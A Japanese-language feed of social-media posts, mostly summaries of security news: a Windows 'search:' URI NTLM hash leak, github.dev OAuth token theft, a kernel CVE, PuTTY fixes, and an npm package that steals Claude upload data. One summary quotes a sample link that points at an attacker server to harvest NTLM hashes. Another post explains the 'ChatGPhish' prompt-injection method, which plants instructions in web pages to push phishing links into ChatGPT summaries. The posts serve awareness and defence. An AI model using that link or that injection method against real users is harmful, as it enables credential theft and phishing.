自分が努力しなかった訳じゃないし、むしろガムシャラにやってはいたと思う。だけどそれだけじゃなく、タイミングや人、案件(叱咤激励や悔しい思いも含めて)に恵まれたと思う。運が良かった。この幸運の輪は循環させないといけない。少なくとも自分の手が届く範囲の人々に返したいと思います。

「npm install」だけでコードが実行される時代が終了へ、npmが自動スクリプト実行を標準で停止する予定 gigazine.net/news/20260611-n…

AI Coding Agentが外部ソースを取得する瞬間にhookして事前チェック通過の物だけ利用するようなアプリを作成。ルールはYAML形式で追加可能。とりあえず、Codexでは想定通り動作しています。そこそこ利用価値はありそうでしょうか？

RT @commte: Claude Code で脆弱性を自動で探して 修正候補まで出す実装 Anthropic 公式が公開してた 並列エージェントがバグを探して、別エージェントが隔離環境で再現検証、修正候補まで作ってくれる github.com/anthropics/defend…

OpenAI Sites やばいなこれ。。。

昨今、これだけ脅威だらけなのに、意味ないと一蹴する上司。。。 そろそろ潮時かも。

Claude Code終了のお知らせ📢 OpenAIが約20万円分の Codex開発環境を、無料で配ってる！ 今すぐ受け取る方法は　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 GitHubに公開リポジトリが 1つでもあれば申請出来る！ 「Codex for OSS」というプログラム 申請して通れば、こんな特典が全部タダ ・ChatGPT Pro 6ヶ月 ・Codexアクセス ・API使用クレジット ・Codex Security 完全無料で申請する方法を 詳しく解説します👇

Windowsの検索機能に新たな認証情報漏えい問題が見つかった。ユーザーがリンクを1回クリックするだけで、攻撃者へNTLMv2ハッシュが送信される恐れがある。現時点で修正プログラムは提供されていない。 Huntressは、Windowsの「search:」URIハンドラーにNTLM認証情報漏えいの脆弱性を発見した。2026年4月に修正されたCVE-2026-33829（Snipping Toolのms-screensketch: URI）と同種の問題だが、こちらにはCVE番号が付与されていない。攻撃者は「search:query=test&crumb=location:\攻撃者サーバー\share」のようなリンクを用意し、ユーザーにクリックさせるだけでSMB認証を誘発できる。認証失敗のダイアログは表示されるものの、その時点ですでにNet-NTLMv2ハッシュは外部サーバーへ送信済みとなる。 この問題はコマンド実行だけでなく、Webページ内のリンクからも悪用可能で、Microsoft Edge上で検索URIを開くだけで認証情報が漏えいする。調査によると「search:」と「search-ms:」は同じCOMコンポーネントを利用しており、入力検証の不備が両方に影響しているとみられる。 Microsoftは本件を「サービス提供基準未満」と判断し修正対象としていない。対策としてHuntressは、不要な端末からのSMB通信（TCP 445/139）を遮断し、SMB署名の強制やNTLM利用制限、メールやプロキシログでのsearch:およびsearch-ms: URI監視を推奨している。 cybersecuritynews.com/window…

GitHubのブラウザー版VS Codeであるgithub.devに、1回のリンククリックだけでGitHubのOAuthトークンを窃取される重大な脆弱性が見つかった。攻撃者は被害者がアクセス可能なすべてのプライベートリポジトリに対する権限を奪える可能性がある。 この問題はVS CodeのWebview実装に起因する。github.devではGitHubからOAuthトークンが自動的に渡されるが、このトークンは単一リポジトリに限定されず、利用者がアクセスできる全リポジトリに対する権限を持つ。 攻撃では、Jupyter Notebookや拡張機能の仕組みを悪用してWebview内でJavaScriptを実行し、悪意ある拡張機能を自動導入する。導入された拡張機能はGitHub OAuthトークンを取得し、アクセス可能なリポジトリ情報とともに外部へ送信できるという。攻撃成立に必要なのは被害者が細工されたリンクを開くことだけとされる。 影響はgithub.devだけでなくデスクトップ版VS Codeにも及ぶ。デスクトップ版では細工されたリポジトリを開く必要があるが、成功した場合はNode.js APIへのアクセスを通じてリモートコード実行につながる可能性がある。 cybersecuritynews.com/1-clic…

Claude Codeに対してサプライチェーン攻撃を行うことが可能だった脆弱性についての記事を公開しました！

RT @MalwareBibleJP: アイティメディア株式会社 （ITmedia Inc.）の「＠ＩＴ」にて掲載いただきました。ありがとうございます。 ■「攻撃してきたのは誰だ？」をすぐに特定 無料で「400超のランサム集団相関図」「身代金メモ検索」アプリを公開　MBSDの…

ChatGPTのWebページ要約機能を悪用し、AIの回答画面内にフィッシングリンクや偽警告を表示させる新手法「ChatGPhish」が公開された。ユーザーは正規のChatGPT応答と見分けにくい。 Permisoの研究者によると、攻撃者は公開Webページへ小さな命令文を埋め込むだけで、ChatGPTの要約結果を操作できる。GitHub READMEやブログ、ドキュメントサイトなどをユーザーが要約した際、悪意ある指示がAIへ取り込まれる。 攻撃では、ChatGPT画面内にクリック可能なフィッシングリンク、アカウント警告を装った偽メッセージ、QRコード、追跡用画像などを表示できる。特にQRコードは別端末で読み取られるため、ブラウザのURLチェックやパスワードマネージャーによる保護を回避できる。 さらに埋め込まれた画像URLを通じて、IPアドレスやUser-Agentなどの情報を収集する追跡も可能だという。研究者はこの攻撃を「ChatGPhish」と命名し、2026年4月にOpenAIへ報告したが、最終的には既知問題として扱われた。 研究者は、AI要約機能で未検証コンテンツを扱う際は表示されたリンクや警告を信用せず、出典表示やリンク先確認を徹底するよう呼びかけている。 cybersecuritynews.com/chatgp…

RT @MalwareBibleJP: 時事通信社様に取材いただきYahoo!ニュースや西日本新聞など複数に掲載いただきました。 jiji.com/jc/article?k=202605…

RT @MalwareBibleJP: Claudeがファイルのアップロードや出力の保管に使うディレクトリを狙い、その中身を攻撃者のGitHubリポジトリへ持ち出す悪性npmパッケージが報告されています。窃取対象には「/mnt/user-data」、Claudeがアップロードや…

ようやく決まりました。これから忙しくなりそうだ😊

手取り28万フルリモートのお仕事は、真っ赤なデタラメで騙されました 非常に悪質なので個人情報の部分はモザイクにしてやり取り全て晒します このまま新幹線代返してくれないなら警察に行こうと思ってます

Windowsカーネルに権限昇格脆弱性CVE-2026-40369が見つかった。ブラウザのサンドボックスを突破してSYSTEM権限取得が可能となり、PoCも公開済みのため悪用拡大が警戒されている。 問題はnt!ExpGetProcessInformation内のNtQuerySystemInformation処理に存在する。リクエスト長を0にした特殊呼び出しで、カーネルが書き込み先アドレスを適切検証せず任意のカーネル仮想メモリを書き換え可能となる。 これによりChrome、Edge、Firefoxなどのサンドボックスを突破し、低権限アプリからSYSTEM相当権限へ昇格できる。攻撃者はKASLR回避ツールなど既存公開技術と組み合わせ、カーネル構造を書き換える攻撃も可能とされる。 研究者Ori Nimronは詳細解析とPoCコードをGitHub上で公開済み。攻撃の自動化やマルウェア組み込みも容易になった。 影響を受けるのはWindows 11 24H2〜25H2。Microsoftは5月のPatch Tuesdayで修正版を配布しており、組織には即時更新適用と不審なカーネル書き込み監視が推奨されている。 securityonline.info/windows-…

PuTTY 0.84が公開され、SSHハンドシェイク時のクラッシュやTelnetプロンプト偽装など複数の脆弱性が修正された。深刻度は低いものの、悪意あるサーバーやMITM攻撃で悪用される可能性がある。 主な修正はECDSA署名検証処理の不備で、細工したSSH鍵によりPuTTYがクラッシュする問題だ。P256、P384、P521などNIST系楕円曲線に影響し、0.71以降が対象となる。ホスト鍵検証前に発生するため、攻撃者はSSH接続時点でDoSを引き起こせる。 さらにRSA鍵交換処理では、短縮された不正鍵によりdouble-freeが発生する脆弱性も修正された。影響は0.72〜0.83で、こちらも悪意あるサーバーやMITM環境から遠隔クラッシュが可能だった。 Telnet関連では「trust sigil」状態リセット不備も修正された。プロキシ認証後にサーバーメッセージが信頼済み表示され、利用者が偽プロンプトへ認証情報を入力する危険があった。 このほかEdDSA署名処理のCVE-2026-4115にも対応済み。PuTTY開発側は深刻な脆弱性ではないとしているが、安全性向上のため0.84への更新が推奨されている。 cybersecuritynews.com/putty-…

RT @MalwareBibleJP: SharePointにリモートコード実行の脆弱性CVE-2026-45659が報告され、5月のセキュリティ更新で修正されています。CVSS8.8（High）で、低権限の認証済みユーザーがネットワーク越しに任意コードを実行できるとされていま…

サイバー対処能力強化法が10月施行 xtech.nikkei.com/atcl/nxt/ma… 『これらの事業者の基幹業務に関わる情報システムを、サイバー攻撃から守るべき「重要電子計算機」と位置付け、強化法ではシステムの資産（ベンダーや製品型名などの情報）の政府への届け出と、サイバー攻撃を受けた際のインシデント報告を義務付ける（図1）。届出義務に違反すると監督官庁の大臣から是正命令が出され、従わなければ200万円以下の罰金が科される』